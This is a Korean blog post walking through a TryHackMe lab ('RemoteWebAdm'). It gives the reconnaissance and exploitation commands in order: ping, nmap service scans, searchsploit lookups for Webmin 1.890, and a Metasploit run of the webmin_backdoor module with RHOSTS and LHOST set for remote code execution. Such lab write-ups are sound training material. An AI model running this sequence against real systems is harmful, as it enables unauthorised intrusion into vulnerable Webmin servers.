Oh! JUN

[redraccoon] ## RemoteWebAdm ## 본문

문제풀이/Redraccoon

[redraccoon] ## RemoteWebAdm ##

Kwon Oh! JUN 2024. 2. 6. 17:09
 

TryHackMe | 모의해킹 기초

레드라쿤 모의해킹 기초 실습방

tryhackme.com

[RemoteWebAdm]

# 연결되는지 확인
ping 10.10.136.198


# 해당 주소에서 사용되고 있는 포트와 서비스 확인 
nmap 10.10.136.198 


# 22, 10000번 포트에 대해서 서비스를 자세하게 스캔하고 tcpDetailed 파일로 출력
nmap -p 22,10000 -sV 10.10.136.198 -oA tcpDetailed


# 서비스 대상으로 취약점 찾기
searchsploit Miniserv 1.890
searchsploit Webmin 1.890
searchsploit Webmin 1.

------------------------------------------------------------------------------------
Exploit Title                                               | path
------------------------------------------------------------------------------------
Webmin 1.920 - Remote Code Execution                        | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metas | linux/remote/47230.rb
------------------------------------------------------------------------------------


# metasploit 실행
sudo msfconsole


# 서비스 취약점 검색
search webmin 1.920

--------------------------------------
# | Name
--------------------------------------
0 | exploit/linux/http/webmin_backdoor
--------------------------------------    


# 0 번째 취약점 사용 
use 0


# 옵션 지정 
set rhosts 10.10.136.198
set lhost 10.4.61.73


# exploit 실행
exploit
저작자표시

'문제풀이 > Redraccoon' 카테고리의 다른 글

[redraccoon] ## rootme ##  (1) 2024.02.07
[redraccoon] ## Catch me if you can ##  (1) 2024.02.06
[redraccoon] ## Robots ##  (0) 2024.02.06
[redraccoon] rcity22 :Morse, steganography  (0) 2024.02.05
'문제풀이/Redraccoon' Related Articles more